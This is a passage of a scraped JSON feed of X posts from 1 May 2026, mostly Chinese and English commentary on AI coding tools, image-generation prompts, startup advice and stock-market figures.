"2026-05-01T17:15:15+00:00", "title": "Damn!确实如此,所有AI编程工具都在卷模型智能,但现在满足基本的生产力了,转而让人崩溃的根本不是模型笨,是它每次开会话都失忆😅\n\nAGENTS.md塞不下100万token的领域知识,\nRAG搜不到\"未知的未知\",\n我自己维护Skills维护到想吐。\n\n在公司里,新人入职花两周pair一下就能内化领域知识。\n现在跟AI协作,每个新session都是\"新人第一天\"——而且是个永远不会转正的新人。这个gap确实没被好的工具解决。\n\n如果有个工具能让用户持续喂入领域知识,且这些知识真正内化到推理里而不只是RAG式的检索拼接,那比现有方案高一个维度。至少目前", "url": "https://x.com/Pluvio9yte/status/2050262789256859872"}, {"handle": "Pluvio9yte", "name": "雪踏乌云", "published_at": "2026-05-01T17:07:00+00:00", "title": "说个暴论,这个一百多万阅读帖子下的评论区里说\"Claude Code杀死了我的大脑\",其实90%搞反了因果🤯🤯🤯\n\n我自己用CC大半年,直接把省下来的执行时间全砸在了架构设计上,脑子不但没退化反而比以前转得更快\n\n以前写代码,80%时间花在执行(查文档、写代码、修bug),20%花在设计。现在执行交给Claude或者Codex了,只有两种结果:\n\n1. 如果把省下的时间也一起交出去,只写prompt按Accept,那就跟刷老虎机没区别,退化是必然的\n\n2. 但是把省下的时间花在架构设计和code review上,认知负荷会不降反升\n\n简单说,AI干掉的是", "url": "https://x.com/Pluvio9yte/status/2050260712858210516"}, {"handle": "charliebilello", "name": "Charlie Bilello", "published_at": "2026-05-01T17:03:07+00:00", "title": "#FF @PeterMallouk, a great follow!", "url": "https://x.com/charliebilello/status/2050259734930800740"}, {"handle": "CuiMao", "name": "CuiMao", "published_at": "2026-05-01T16:08:50+00:00", "title": "比我还抽象,刚才刷抖音,刷到个一个女的说,她自己用一个月的时间从什么都不懂的 AI 白痴,通过她的这套学习方法论,拿到了中厂的agent工程师 offer 😅😅😅😅,评论区一堆人求资料,\n这个逼社会太疯狂了,我已经看不懂了。", "url": "https://x.com/CuiMao/status/2050246075219693922"}, {"handle": "0xAA_Science", "name": "0xAA", "published_at": "2026-05-01T16:01:35+00:00", "title": "我发现 Cursor 额度还挺耐用的,使劲蹬才用掉了 $150,这 $10,000 得用到什么时候?\n看起来只有跑类似 auto research 的循环任务才能消耗掉这些 token 了!", "url": "https://x.com/0xAA_Science/status/2050244250563182801"}, {"handle": "0xAA_Science", "name": "0xAA", "published_at": "2026-05-01T15:59:10+00:00", "title": "目前 WTF AI 讨论群已经 700 多人了,如果你的申请没有通过,可以推特私信我你的 TG 昵称。", "url": "https://x.com/0xAA_Science/status/2050243640925233619"}, {"handle": "CuiMao", "name": "CuiMao", "published_at": "2026-05-01T15:54:12+00:00", "title": "I mainly focus on AI tech research and honestly, I’m not into crypto at all. Pls stop sending me DMs about collabs. Thanks🫡🫡🫡", "url": "https://x.com/CuiMao/status/2050242393132396921"}, {"handle": "jason", "name": "Jason Calacanis", "published_at": "2026-05-01T15:48:23+00:00", "title": "Why Agent-Owned Busineses Will Run America… https://x.com/i/broadcasts/1jxXgeAleadJZ", "url": "https://x.com/jason/status/2050240926707314767"}, {"handle": "lxfater", "name": "铁锤人", "published_at": "2026-05-01T15:47:13+00:00", "title": "Apple Support App发布打包进了Claude.md 文件\n\n看来苹果$1B 建 Apple Intelligence已经彻底报废,都用上Cluade code,哈哈哈", "url": "https://x.com/lxfater/status/2050240636020732015"}, {"handle": "GoSailGlobal", "name": "Jason Zhu", "published_at": "2026-05-01T15:43:21+00:00", "title": "R to @GoSailGlobal: 提示词:\nRework the given image into a crayon-style illustration, transforming the entire scene into something that feels hand-drawn by a 10-year-old. Keep the forms simple and slightly imperfect, like a child’s drawing. Avoid using the original color palette—rep", "url": "https://x.com/GoSailGlobal/status/2050239662288146865"}, {"handle": "GoSailGlobal", "name": "Jason Zhu", "published_at": "2026-05-01T15:43:21+00:00", "title": "海外疯玩的prompt \n\n可以用来给自己的profile,生成一个十岁小孩的蜡笔画\n\n提示词放下面👇(截图+pormpt就行):", "url": "https://x.com/GoSailGlobal/status/2050239659377295552"}, {"handle": "svwang1", "name": "王川(硅谷)", "published_at": "2026-05-01T15:31:23+00:00", "title": "不要和别人竞争。让他们变得无关紧要。\n\n你在决定和某某人竞争的那一刻,就已经束缚住自己的手脚,就放弃了针对自身的优缺点制定灵活策略的选择,就已经输了。\n\n在你开始布局让他们变得无关紧要的时候,他们慢慢无法限制你,而你的策略只适合你自己的特点,别人无法简单模仿,你就已经开始赢了。", "url": "https://x.com/svwang1/status/2050236650329186525"}, {"handle": "GoSailGlobal", "name": "Jason Zhu", "published_at": "2026-05-01T15:30:01+00:00", "title": "发现海外的人真牛逼,AI真的可以做游戏啦❗️❗️\n\n这是 AI 做整套游戏角色目前唯一能跑通的工作流\n\n99% 的人卡在 walk cycle(走路循环动画,左右腿交替的连续动作)上,是因为他们一直试图用 GPT Image 2.0(OpenAI 最新的图像生成模型)/ Nano Banana 2(Google Gemini 的图像生成模型代号)解决 \n\n无论怎么 prompt(给 AI 的文字指令)、怎么传参考图,图像模型就是做不出对的走路循环 左右腿对不上、人物飘出画框、scaling(缩放比例)会乱\n\n🌟 视频模型在这一步反而无敌 \n\nSeedan", "url": "https://x.com/GoSailGlobal/status/2050236307721584945"}, {"handle": "paulg", "name": "Paul Graham", "published_at": "2026-05-01T15:24:04+00:00", "title": "R to @paulg: I was trying to think what's the opposite of this kind of company. Who really respects their customers? And I realized (I swear I didn't set this up) the answer is YC. YC's customers are Tony Xu and Brian Chesky and the Collisons. Respect? More like awe, frankly.", "url": "https://x.com/paulg/status/2050234809188761677"}, {"handle": "svwang1", "name": "王川(硅谷)", "published_at": "2026-05-01T15:21:59+00:00", "title": "不要和别人竞争。让他们变得无关紧要。你在决定和某某人竞争的那一刻,就已经束缚住自己的手脚,就已经输了。", "url": "https://x.com/svwang1/status/2050234282208317919"}, {"handle": "sama", "name": "Sam Altman", "published_at": "2026-05-01T15:18:10+00:00", "title": "RT by @sama: Don't join a company or industry that has contempt for its customers. You can make a lot of money that way, and of course it gives you a feeling of superiority, but you'll never do great work for a market you despise.", "url": "https://x.com/sama/status/2050233324963008553"}, {"handle": "paulg", "name": "Paul Graham", "published_at": "2026-05-01T15:18:10+00:00", "title": "Don't join a company or industry that has contempt for its customers. You can make a lot of money that way, and of course it gives you a feeling of superiority, but you'll never do great work for a market you despise.", "url": "https://x.com/paulg/status/2050233324963008553"}, {"handle": "jason", "name": "Jason Calacanis", "published_at": "2026-05-01T15:06:52+00:00", "title": "Why Agent-Owned Busineses Will Run America… https://x.com/i/broadcasts/1yKAPMBDzLyxb", "url": "https://x.com/jason/status/2050230480751243284"}, {"handle": "runes_leo", "name": "Leo", "published_at": "2026-05-01T15:03:25+00:00", "title": "终于。\n\nClaude Code 长 session 跑久了,/resume 卡到怀疑人生,每次启动还得等最慢那个 MCP 拖几秒到十几秒——CC 重度用户应该都熟。这次一波修了。\n\n实打实有体感的两条:\n• /resume 在 40MB+ session 上快了 67%,50MB 的 /branch 上限也砍了——我自己 subagent 转录飙到过 122M(人家 50MB 上限的两倍多),主 session 也常驻 55M+,这次提速能直接吃到\n• MCP servers 改成并发连接,启动不再卡最慢那个——装了 serena / playwrig", "url": "https://x.com/runes_leo/status/2050229609795407876"}, {"handle": "HarryStebbings", "name": "Harry Stebbings", "published_at": "2026-05-01T15:02:00+00:00", "title": "Why Google is a mega-buy on the back of the Anthropic investment \n\n\"Google becomes a win on multiple fronts.\n\nThey benefit whether usage goes to Gemini or Anthropic.\n\nThey have unmatched compute capacity and cash flow, letting them allocate resources across their own models and p", "url": "https://x.com/HarryStebbings/status/2050229254705553516"}, {"handle": "sama", "name": "Sam Altman", "published_at": "2026-05-01T15:01:14+00:00", "title": "R to @sama: i'm hopeful for a future where people who want to work really hard have incredibly fulfilling things to do, and people who don't want to work hard don't have to and can still have an amazing life of prosperity.", "url": "https://x.com/sama/status/2050229060887044494"}, {"handle": "sama", "name": "Sam Altman", "published_at": "2026-05-01T15:01:13+00:00", "title": "R to @sama: i think a lot of people are going to be busier (and hopefully more fulfilled) than ever, and jobs doomerism is likely long-term wrong.\n\nthough of course there will be disruption/significant transition as we switch to new jobs, the jobs of the future may look v differe", "url": "https://x.com/sama/status/2050229059507159242"}, {"handle": "sama", "name": "Sam Altman", "published_at": "2026-05-01T15:01:13+00:00", "title": "we want to build tools to augment and elevate people, not entities to replace them.", "url": "https://x.com/sama/status/2050229058425045178"}, {"handle": "berryxia", "name": "Berryxia", "published_at": "2026-05-01T14:50:44+00:00", "title": "比起疯传的那个风格,我自己更偏爱这个风格。\n\nPrompt:\n「彩色潦草小狗线条风格绘制该图,童趣和doodle加入其中,务必使用毫无章法的绘制手法,凌乱和草率即可。』", "url": "https://x.com/berryxia/status/2050226420681757102"}, {"handle": "paulg", "name": "Paul Graham", "published_at": "2026-05-01T14:42:53+00:00", "title": "RT by @paulg: A 7-million parameter model outperforming models a thousand times its size on tasks like ARC Prize. That's what recursive reasoning unlocks.\n\nIn this episode of Decoded, YC's @agupta and @FrancoisChauba1 break down two recent papers on recursive AI models, HRMs and ", "url": "https://x.com/paulg/status/2050224443461718118"}, {"handle": "berryxia", "name": "Berryxia", "published_at": "2026-05-01T14:37:39+00:00", "title": "“ChatGPT,你陪我段时间了,我想看看你的样子。请成一张类似你iPhone随拍的照:没有明确主题、没有刻意构图,只是很普通、甚至有点失败的快照。照略带运动模糊,光线不均、轻微曝光过度,角度尴尬,构图混乱,整体呈现出一种“过于真实的随手一拍感\",就像是从口袋里拿出手机不小心按到的自拍。”", "url": "https://x.com/berryxia/status/2050223126739665337"}, {"handle": "Pluvio9yte", "name": "雪踏乌云", "published_at": "2026-05-01T14:30:32+00:00", "title": "Sam Altman 在和 Stripe 联合创始人 Patrick Collison 的访谈里亲口承认:OpenAI 没有护城河,而且永远不会有。\n\n这话从地球上估值最高的私人公司 CEO嘴里说出来,确实值得认真看一下。\n\n以下是几个核心信息:\n\n1. Sam 说希望 OpenAI 做一个\"forever low margin\"(永远低利润率)的公司,类比 utility company(公用事业公司,简单说就是水电煤那种)。只要业务足够大、增速足够快,利润率低他不在乎。\n\n2. 他说 AI 的 switching costs(切换成本)正在崩塌。还拿", "url": "https://x.com/Pluvio9yte/status/2050221337424408733"}, {"handle": "berryxia", "name": "Berryxia", "published_at": "2026-05-01T14:29:58+00:00", "title": "🚀 GameHub Evolution 正式上线!\n\n架构全面大升级,Steam启动速度翻倍 + Epic Games 原生集成,手机玩PC大作体验直接起飞!\n\n1. Steam Launch Boost:游戏启动速度提升数倍\n\n2. Ultimate Virtual Controls + 配置分享:最强大自定义布局 + Share Code 一键分享\n\n3. Epic Games 原生集成:直接访问海量 Epic 游戏库\n\n4. 横竖屏无缝切换 + 复古模拟器:经典游戏掌上畅玩\n\nEarly Access 版本,已不支持回退旧版,欢迎大家反馈!\n\n官方", "url": "https://x.com/berryxia/status/2050221193752637888"}, {"handle": "paulg", "name": "Paul Graham", "published_at": "2026-05-01T14:15:19+00:00", "title": "This is an instance of the more general principle: If you are graduating university and are about to join a consulting firm, don't do that.", "url": "https://x.com/paulg/status/2050217507374457280"}, {"handle": "realNyarime", "name": "奶昔", "published_at": "2026-05-01T14:03:27+00:00", "title": "近期市面上出现eLink可编程eUICC实体卡,芯片布局上与eSTK极其相似,暂不明确该卡的EID及制造厂商\n不做推荐,我已在他们淘宝店「eLink Store」下单\n\n目前市面上的实体eSIM卡均不可缺少的功能:\n支持自定义ARA-M权限配置\n兼容各类写卡软件及读卡器读写\n并可通过STK菜单实现eSIM Profile下载、切换与管理", "url": "https://x.com/realNyarime/status/2050214520162038238"}, {"handle": "charliebilello", "name": "Charlie Bilello", "published_at": "2026-05-01T13:48:51+00:00", "title": "The Nasdaq Composite just crossed above 25,000 for the first time. A year ago it was at 18,000. 5 years ago it was at 14,000. 10 years ago it was at 4,800.", "url": "https://x.com/charliebilello/status/2050210847650132146"}, {"handle": "Pluvio9yte", "name": "雪踏乌云", "published_at": "2026-05-01T13:42:36+00:00", "title": "Theo 这条说得挺实在的:GPT 更聪明能帮你 unblock,但会以很蠢的方式卡住;Opus 会走一些很野的路径,但对你意图的理解确实更好。\n\n他的结论是根据任务类型来回切换,而不是站队。\n\n这跟我自己的体感基本一致。我现在日常编程也是双工具流:\n\n1. 需要快速解决一个明确的技术问题、查 API 用法、debug 报错信息,GPT 响应快、知识面广,确实好用\n\n2. 需要做一个比较复杂的重构、写一个完整的功能模块,Opus 对上下文和意图的把握更稳,不容易跑偏\n\n3. 写作、翻译这类对语感要求高的任务,Opus 还是明显更好\n\nTheo 还提了一个", "url": "https://x.com/Pluvio9yte/status/2050209273310060805"}, {"handle": "berryxia", "name": "Berryxia", "published_at": "2026-05-01T13:36:12+00:00", "title": "破案了,应该是美团的模型😄", "url": "https://x.com/berryxia/status/2050207663892627601"}, {"handle": "GaryMarcus", "name": "Gary Marcus", "published_at": "2026-05-01T13:34:42+00:00", "title": "First Silicon Valley captured the US Government, and now it is capturing “independent” media.", "url": "https://x.com/GaryMarcus/status/2050207285377417591"}, {"handle": "charliebilello", "name": "Charlie Bilello", "published_at": "2026-05-01T13:21:35+00:00", "title": "The S&P 500 hit its 11th all-time high of the year yesterday.\n\nVideo: https://www.youtube.com/watch?v=IC55jwli3-8&t=858s", "url": "https://x.com/charliebilello/status/2050203982388142245"}, {"handle": "dingyi", "name": "Ding", "published_at": "2026-05-01T13:04:04+00:00", "title": "Stop making coding agents...\n\nhttps://www.dpcode.cc/", "url": "https://x.com/dingyi/status/2050199576603468134"}, {"handle": "charliebilello", "name": "Charlie Bilello", "published_at": "2026-05-01T13:04:00+00:00", "title": "RT by @charliebilello: The market isn’t red or blue - it’s green.\nIt doesn’t care about politics.\nIt runs on earnings, innovation, and growth.", "url": "https://x.com/charliebilello/status/2050199558995738866"}, {"handle": "charliebilello", "name": "Charlie Bilello", "published_at": "2026-05-01T12:56:38+00:00", "title": "Since the start of the Iran war...\nJet Fuel: +80%\nSulfur: +68%\nHeating Oil: +56%\nWTI Crude Oil: +55%\nBrent Crude Oil: +52%\nDiesel: +48%\nGasoline: +47%\nUrea: +47%\nEuropean Nat Gas: +44%\nFertilizer: +23%\nCoal: +13%\nPalm Oil: +13%\nIron Ore: +8%\nWheat: +6%\nS&P 500: +5%\n$VIX: -15%", "url": "https://x.com/charliebilello/status/2050197704941158556"}, {"handle": "charliebilello", "name": "Charlie Bilello", "published_at": "2026-05-01T12:50:39+00:00", "title": "Gas prices in the US have moved up to $4.39 per gallon, their highest level since July 2022. The 47% spike over the last 9 weeks ($2.98/gallon to $4.39/gallon) is the biggest we've seen in the past 30 years.", "url": "https://x.com/charliebilello/status/2050196201014718675"}, {"handle": "GoSailGlobal", "name": "Jason Zhu", "published_at": "2026-05-01T12:48:53+00:00", "title": "英文圈 freelancer 每月从客户那拿 $5K-$25K 做的事 \n\nAnthropic 官方在一个 30 分钟的视频里全讲完了\n\n中文圈知道的人不到 1%,传开就没差价了\n\n他们做的就一件事 把 Claude Code SDK + GitHub Action 接到客户自己的代码仓库里,做成一套自动化的工程流水线\n\n为什么客户愿意为这个付钱?\n\n 不是 AI 写代码这件事值钱,是「把 AI 放进生产环境、且不会乱删生产代码」这件事值钱\n\nAnthropic Claude Code 工程负责人 Sid Bidasaria 在视频里讲了三个分水岭\n1️", "url": "https://x.com/GoSailGlobal/status/2050195755936448705"}, {"handle": "paulg", "name": "Paul Graham", "published_at": "2026-05-01T12:40:47+00:00", "title": "RT by @paulg: This is remarkable and you should watch this entire video.\n\nThe House was going to pass a 45 day extension of FISA 702 (Foreign Intelligence Surveillance Act), BY VOICE WITHOUT VOTING, and Thomas Massie courageously forced a debate and demanded a recorded vote.\n\nJim", "url": "https://x.com/paulg/status/2050193715063300532"}, {"handle": "GoSailGlobal", "name": "Jason Zhu", "published_at": "2026-05-01T12:33:04+00:00", "title": "大部分人的 RAG 系统,只检索一次就完事了——这可能是你效果上不去的最大原因。\n\nvia @omarsar0 这条帖子讲的是「推理过程中什么时候该去检索」,AI 开发者建议收藏。\n\n核心观点拆解:\n\n1️⃣ 多数 RAG 系统的做法是:用户提问 → 检索一次 → 丢给模型生成答案。一锤子买卖,检索质量不够,后面全白搭。\n\n2️⃣ 更好的思路是在推理过程中动态触发检索——模型推到一半发现信息不够,再去拿一轮上下文,而不是开头一把梭。\n\n3️⃣ 这背后的逻辑是:复杂问题往往需要多跳推理,第一次检索拿到的文档不一定能覆盖所有子问题,中途补检索才能让推理链不断", "url": "https://x.com/GoSailGlobal/status/2050191775881736409"}, {"handle": "Pluvio9yte", "name": "雪踏乌云", "published_at": "2026-05-01T12:25:12+00:00", "title": "牛逼,今天刷到一篇帖子,然后成功用这个方法双开了微信👇\n\n只需要将这段话发给Codex:\n\n使用该项目 https://github.com/mcncarl/yichen-skills/tree/main/mac-wechat-dual-open 帮我安装微信双开。把它的图标换成蓝色。", "url": "https://x.com/Pluvio9yte/status/2050189794324713656"}, {"handle": "GoSailGlobal", "name": "Jason Zhu", "published_at": "2026-05-01T12:21:44+00:00", "title": "孙割是真割啊\n\n我是懒得去试\n\n积分额度随便调,背后调度可想而知😅", "url": "https://x.com/GoSailGlobal/status/2050188921665941984"}, {"handle": "lxfater", "name": "铁锤人", "published_at": "2026-05-01T12:21:36+00:00", "title": "身体脆弱就会造成精神脆弱\n\n精神脆弱就会导致效率低下", "url": "https://x.com/lxfater/status/2050188888744804410"}, {"handle": "gkxspace", "name": "余温", "published_at": "2026-05-01T12:00:26+00:00", "title": "Gemini会员每个月能领谷歌云额度,别忘啦,Pro10美金/月,Ultra100美金/月\n\n一次有效期一年,用不到就先攒着吧😄\n\nhttps://me.developers.google.com/benefits?hl=zh-cn", "url": "https://x.com/gkxspace/status/2050183561316016186"}, {"handle": "liuliu", "name": "刘进", "published_at": "2026-05-01T11:34:44+00:00", "title": "RT by @liuliu: 浏览器里跑 ASR 真的不是梦,一个完全没做啥优化的版本就能做到很高的准确率和推理速度了,估计我能优化到 0.04 这个速度(浏览器识别1秒音频需要 0.04秒时间)", "url": "https://x.com/liuliu/status/2050177096505561140"}, {"handle": "paulg", "name": "Paul Graham", "published_at": "2026-05-01T11:19:10+00:00", "title": "RT by @paulg: I am very saddened by the news that Martijn van der Vorm has passed away.\n\nIt is safe to say that, without Martijn, The Ocean Cleanup wouldn’t be where it is today, or perhaps wouldn’t be here at all. He was one of the first people to support us in a major way. It w", "url": "https://x.com/paulg/status/2050173178689749188"}, {"handle": "HarryStebbings", "name": "Harry Stebbings", "published_at": "2026-05-01T10:53:28+00:00", "title": "I am sorry but work from home Friday is a 4-day work week. Even worse when the Friday is a sunny Friday. \n\nBack to the office. 996.", "url": "https://x.com/HarryStebbings/status/2050166710645268939"}, {"handle": "ylecun", "name": "Yann LeCun", "published_at": "2026-05-01T10:36:08+00:00", "title": "RT by @ylecun: All the Doomers and hawks are lining up behind this distillation \"attack\" farce because they want to see open source banned. \n\nIt's really as simple as that.\n\nThey want to take away your right to choose, and take away businesses' rights to fine tune and make your p", "url": "https://x.com/ylecun/status/2050162348891979817"}, {"handle": "pmarca", "name": "Marc Andreessen", "published_at": "2026-05-01T10:15:11+00:00", "title": "Concerning.", "url": "https://x.com/pmarca/status/2050157073883902069"}, {"handle": "pmarca", "name": "Marc Andreessen", "published_at": "2026-05-01T10:10:19+00:00", "title": "Co-sign.", "url": "https://x.com/pmarca/status/2050155852460675379"}, {"handle": "GoSailGlobal", "name": "Jason Zhu", "published_at": "2026-05-01T10:05:55+00:00", "title": "GPT 5.5 可以通过设定目标和指标\n\n自行迭代优化🔁", "url": "https://x.com/GoSailGlobal/status/2050154742480040440"}, {"handle": "CuiMao", "name": "CuiMao", "published_at": "2026-05-01T09:31:03+00:00", "title": "RT by @CuiMao: I LOVE Deepseek-v4-flash, incredibly reliable and capable, logical. It's lacking in frontend but I have MiMo for that. \n\nI would recommend any company spending 100k+ a year on AI to purchase 8-10~ 6000s and have a few of the works to have them blind test these mode", "url": "https://x.com/CuiMao/status/2050145968553709999"}, {"handle": "pmarca", "name": "Marc Andreessen", "published_at": "2026-05-01T09:21:25+00:00", "title": "RT by @pmarca: A great summary of the 21st century so far", "url": "https://x.com/pmarca/status/2050143545525211213"}, {"handle": "realNyarime", "name": "奶昔", "published_at": "2026-05-01T09:17:00+00:00", "title": "那些餐饮店的饮料还以为是做慈善\n原来进货价就1毛钱一瓶水实测可以买很多瓶\n自己有多少个号买多少个号,应该不是敌敌畏\n0.1🉐百花蜂蜜500g\nhttps://u.jd.com/fOY2tiP\n0.1🉐弱碱苏打水300ml*1瓶\nhttps://u.jd.com/fgYnQ2p\n0.1🉐金银花罗汉果茶360ml*1瓶\nhttps://u.jd.com/fOYTQzZ\n0.1🉐百合绿豆水400ml*1瓶\nhttps://u.jd.com/f6YpRFx", "url": "https://x.com/realNyarime/status/2050142432088526883"}, {"handle": "CuiMao", "name": "CuiMao", "published_at": "2026-05-01T09:15:45+00:00", "title": "北京环球影城!✌️", "url": "https://x.com/CuiMao/status/2050142119604691422"}, {"handle": "dingyi", "name": "Ding", "published_at": "2026-05-01T08:57:02+00:00", "title": "这个音频组件库做得太完美了。\n\nhttps://audio.raphaelsalaja.com/", "url": "https://x.com/dingyi/status/2050137408268886450"}, {"handle": "realNyarime", "name": "奶昔", "published_at": "2026-05-01T08:55:20+00:00", "title": "从昨天开始有不少网友反馈iOS推送异常,原因未知\n在对 http://push.apple.com 分流后仍无法接到Telegram等App推送,切换外区Apple ID后恢复,但CN直连失败\n\n这是Apple自App Store对中国大陆IP重定向至/cn(国区商店)后,进一步限制移动端设备推送,暂不影响macOS", "url": "https://x.com/realNyarime/status/2050136980454031800"}, {"handle": "pmarca", "name": "Marc Andreessen", "published_at": "2026-05-01T08:49:27+00:00", "title": "On Project Fear.", "url": "https://x.com/pmarca/status/2050135501550883051"}, {"handle": "pmarca", "name": "Marc Andreessen", "published_at": "2026-05-01T08:48:42+00:00", "title": "…", "url": "https://x.com/pmarca/status/2050135309053276499"}, {"handle": "pmarca", "name": "Marc Andreessen", "published_at": "2026-05-01T08:47:13+00:00", "title": "…", "url": "https://x.com/pmarca/status/2050134937396007224"}, {"handle": "pmarca", "name": "Marc Andreessen", "published_at": "2026-05-01T08:38:10+00:00", "title": "Self recommending.", "url": "https://x.com/pmarca/status/2050132661348561361"}, {"handle": "pmarca", "name": "Marc Andreessen", "published_at": "2026-05-01T08:33:16+00:00", "title": "I remember that moral panic too! And the one before that, when the Anarchist’s Cookbook was being [shudder] photocopied.", "url": "https://x.com/pmarca/status/2050131426499301840"}, {"handle": "pmarca", "name": "Marc Andreessen", "published_at": "2026-05-01T08:31:37+00:00", "title": "“Jack Valenti [then head of the film industry’s MPAA] famously told a congressional panel in 1982, ‘I say to you that the VCR is to the American film producer and the American public as the Boston Strangler is to the woman home alone.’”", "url": "https://x.com/pmarca/status/2050131011095404902"}, {"handle": "0xAA_Science", "name": "0xAA", "published_at": "2026-05-01T08:23:56+00:00", "title": "贵州牛肉粉 3u", "url": "https://x.com/0xAA_Science/status/2050129079677145442"}, {"handle": "runes_leo", "name": "Leo", "published_at": "2026-05-01T08:17:19+00:00", "title": "Anthropic 这招真狠,所有 Claude Code 用户都该看一眼。\n\n@theo 做了个最干净的实验:\n建一个空 Git 仓库,commit 只放一行 JSON:\n\n{\"schema\": \"openclaw.inbound_meta.v1\"}\n\n调用官方 Claude Code —— 直接报错\"out of extra usage\"。\n要么拒绝请求,要么强制多收一份钱。\n\n0 行业务代码,只因为那一行 JSON 里有 OpenClaw 这个单词。\n\n模型在卷开源,工具会不会开始卷封闭?", "url": "https://x.com/runes_leo/status/2050127414630469937"}, {"handle": "pmarca", "name": "Marc Andreessen", "published_at": "2026-05-01T08:17:08+00:00", "title": "The same will be true of “because of AI”.", "url": "https://x.com/pmarca/status/2050127365930729486"}, {"handle": "pmarca", "name": "Marc Andreessen", "published_at": "2026-05-01T08:16:13+00:00", "title": "Image", "url": "https://x.com/pmarca/status/2050127137898922384"}, {"handle": "pmarca", "name": "Marc Andreessen", "published_at": "2026-05-01T08:15:12+00:00", "title": "Every argument of “because of the smartphone” or “the Internet” or “social media” is cope, to avoid confronting the catastrophic collapse of incumbent institutional competence over the same timeframe.", "url": "https://x.com/pmarca/status/2050126879982805379"}, {"handle": "pmarca", "name": "Marc Andreessen", "published_at": "2026-05-01T08:03:23+00:00", "title": "Ooh.", "url": "https://x.com/pmarca/status/2050123904849699053"}, {"handle": "pmarca", "name": "Marc Andreessen", "published_at": "2026-05-01T08:01:35+00:00", "title": "R to @pmarca: Credit @qorprate", "url": "https://x.com/pmarca/status/2050123454373048716"}, {"handle": "pmarca", "name": "Marc Andreessen", "published_at": "2026-05-01T07:56:57+00:00", "title": "And yet we write.", "url": "https://x.com/pmarca/status/2050122286603321365"}, {"handle": "GoSailGlobal", "name": "Jason Zhu", "published_at": "2026-05-01T07:53:41+00:00", "title": "Spotify真的挺有意思的\n\n为人类艺术家打上了“验证”标签\n\n是不是太多AI生成了。\n\n看来AI Generate的标识已经打不过来,甚至分辨不出来了", "url": "https://x.com/GoSailGlobal/status/2050121466021363878"}, {"handle": "pmarca", "name": "Marc Andreessen", "published_at": "2026-05-01T07:51:20+00:00", "title": "Ooh.", "url": "https://x.com/pmarca/status/2050120872309264725"}, {"handle": "pmarca", "name": "Marc Andreessen", "published_at": "2026-05-01T07:49:08+00:00", "title": "Ooh.", "url": "https://x.com/pmarca/status/2050120321399951771"}, {"handle": "GoSailGlobal", "name": "Jason Zhu", "published_at": "2026-05-01T07:49:04+00:00", "title": "OpenAI 要分家了\n\n山姆(Sam)醉酒发推\n\nGitHub 要完蛋了\n\nAnthropic 还是老样子\n\n播客也挺难的,支持一下", "url": "https://x.com/GoSailGlobal/status/2050120304203317373"}, {"handle": "bozhou_ai", "name": "泊舟", "published_at": "2026-05-01T07:46:06+00:00", "title": "Dragoncode群友也分享了一下设计的聚合站,我目前做的产品都是在这里面直接拿设计风格\n\nhttps://getdesign.md", "url": "https://x.com/bozhou_ai/status/2050119556644171998"}, {"handle": "Pluvio9yte", "name": "雪踏乌云", "published_at": "2026-05-01T07:40:37+00:00", "title": "⏺ OpenAI 官方发了一份 GPT-5.5 的 Prompt 编写指南,核心观点一句话概括:别再写又臭又长的 Prompt 了,告诉模型你要什么结果就行。\n\n这份指南的思路挺有意思。以前大家写 Prompt 的习惯是\"手把手教\":先做A,再做B,然后比较C。\n\n现在 OpenAI 官方的建议是:描述终点,而不是规定路线。\n\n几个值得注意的点:\n\n1. Outcome-First(结果导向):\n\n不要写一堆步骤让模型按顺序执行,而是描述\"成功是什么样的\",让模型自己决定怎么走。翻译成人话:以前是写\nSOP,现在是写验收标准。\n\n2. 停止条件(Stop", "url": "https://x.com/Pluvio9yte/status/2050118179062743418"}, {"handle": "frxiaobei", "name": "凡人小北", "published_at": "2026-05-01T07:35:11+00:00", "title": "这几周 Codex 常驻电脑,已经很久没有打开 ChatGPT 了。\n\n推荐一下插件和自动化,很上头。", "url": "https://x.com/frxiaobei/status/2050116811769954778"}, {"handle": "dingyi", "name": "Ding", "published_at": "2026-05-01T07:05:58+00:00", "title": "新时代的设计灵感聚合站,应该长这样。把网站的设计样式都变成了 design.md\n\nhttps://styles.refero.design/", "url": "https://x.com/dingyi/status/2050109458957947150"}, {"handle": "realNyarime", "name": "奶昔", "published_at": "2026-05-01T07:02:32+00:00", "title": "小米之家河南限定五一礼物钧瓷已拿到\n还送了水和王者明信片,汝窑会更好看,天青色\n\n对了,其实周杰伦的青花瓷这首歌最初写词是写的汝瓷\n不知道为啥换名字了\n\n青花瓷是靛蓝或者宝石蓝,不是天青色", "url": "https://x.com/realNyarime/status/2050108592246984780"}, {"handle": "realNyarime", "name": "奶昔", "published_at": "2026-05-01T06:32:41+00:00", "title": "跟推友问好👋\n\n有一个问题想问大家🙋\n\n放假都没出去,看了一圈好像没什么好玩的地方🤔\n\n所以想问问,有什么值得两人旅行的地方?😳", "url": "https://x.com/realNyarime/status/2050101082433720730"}, {"handle": "runes_leo", "name": "Leo", "published_at": "2026-05-01T06:14:26+00:00", "title": "Karpathy 这场 Sequoia 演讲把 AI 编程下个阶段讲透了,最有感触的是第 6 条。\n\n1. Software 3.0 来了。\n1.0 写代码,2.0 训神经网络,3.0 在 LLM 的 context 里用自然语言\"编程\"。\n\n2. 2025-12 是拐点。\n生成代码块变大变连贯,编程的最小单位从\"写代码\"升级到\"委派任务\"。\n\n3. 神经网络会成主计算层。\n未来不是 CPU 上跑神经网络,是神经网络当主进程,传统计算变辅助。\n\n4. 许多应用会消失。\n用户不需应用,直接拿模型输出。MenuGen 那种轻量工具最先被替代。\n\n5. 验证性", "url": "https://x.com/runes_leo/status/2050096487967695197"}, {"handle": "GoSailGlobal", "name": "Jason Zhu", "published_at": "2026-05-01T05:58:11+00:00", "title": "硅谷101 这期 DeepSeek,我反复看了 3 遍\n\n陈茜也转发了我的推文\n\n3 个细节没人注意到,但对我们做出海/独立开发的影响最大:\n\n1️⃣ DeepSeek 全员 ~150 人,正面打 OpenAI 1000+\n\n出海产品从来不是\"等团队够大\",是\"敢做\"\n\n我 1 个人 3 个月上了 4 个出海工具,靠的就是 Cursor + DeepSeek API + 不内耗\n\n2️⃣ 幻方 7 年量化背景,把\"模型上线 → A/B → 不行就删\"做成了肌肉记忆\n\n3 周一次大版本,迭代速度是 OpenAI 的 3 倍\n\n独立开发者天然就该这么干,但 ", "url": "https://x.com/GoSailGlobal/status/2050092401004564952"}, {"handle": "bozhou_ai", "name": "泊舟", "published_at": "2026-05-01T05:57:01+00:00", "title": "目前已经有4位伙伴提交了作品,挺有意思的,都是一些小工具,估计就一两个小时就完成了", "url": 